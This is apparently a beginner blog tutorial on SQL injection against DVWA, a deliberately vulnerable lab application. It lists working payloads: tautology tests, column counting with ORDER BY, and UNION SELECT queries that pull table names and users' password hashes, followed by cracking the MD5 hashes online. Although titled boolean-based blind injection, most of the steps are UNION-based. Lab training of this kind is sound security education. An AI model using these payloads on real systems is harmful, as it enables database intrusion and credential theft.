Performing Boolean-based Blind SQL Injection on DVWA Environment(Beginners).
Boolean-based SQL injection is a technique which relies on sending an SQL query to the database. This injection technique forces the application to return a different result, depending on the query. Depending on the boolean result (TRUE or FALSE), the content within the HTTP response will change, or remain the same. The result allows an attacker to judge whether the payload used returns true or false, even though no data from the database are recovered. Also, it is a slow attack; this will help the attacker to enumerate the database. Reference:- https://beaglesecurity.com/blog/vulnerability/boolean-based-blind-sql-injection.html
Here we will perform the tutorial in DVWA environment for the better understanding of Boolean Blind Based SQL Injection.
Practical
- Firstly for the first time starters, when you login into DVWA environment go to DVWA security tab there you can see the security is set to impossible as default there you choose the security low and then submit.
- You might face some problems in performing Blind based SQL injection in DVWA 2020 so we can perform same method in SQL Injection tab.
- Now select SQL Injection tab where you can see the environment like the picture given below.
4. Now instead of inserting any query in url area we will insert our all the in the User ID tab.
5. Now we will check whether Blind SQL injection possible or not. For that we put the query “ 1' and 1=1# “ (Reason of using 1=1 is that we are balancing the query by making it true ). If Blind SQL injection not possible it will not show any result.
6. Above image shows that the Blind SQL Injection is possible because we can see the query is injected and showing as a result in ID section.
7. Now we will check the number of columns present in database.
8. For checking the number of columns we use the query “ 1' and 1=1 order by 3# “ .
9. If it throws error we will be sure that number of column is not available in database and we keep decreasing the number one by one till we get the output.
10. Now we use the query “ ‘or’ 1=1 — — “.
11. This command will list every user.
12. Now we will list all tables in database using the query “ 1' and 1=0 union select null, table_name from information_schema.tables# “
13. Now we will select the users column by injecting the query “ 1' and 1=0 union select null, table_name from information_schema.columns where table_name=’users’# “
14. Now we will get all tables names and columns names in users.
15. For that we will use the query “ 1' and 1=0 union select null, concat(table_name, 0x0a, column_name) from information_schema.columns where table_name=’users’# “
16. From above image we can see that password and first name is important information we needed so we fill get that information by using the query “ 1' and 1=0 union select null, concat(first_name, 0x0a, password) from users# “
17. BOOM!!!! We got all users first name and password but all password is encrypted by MD5 algorithm so we can easily decrypt it by using online MD5 decrypter.
Thank You
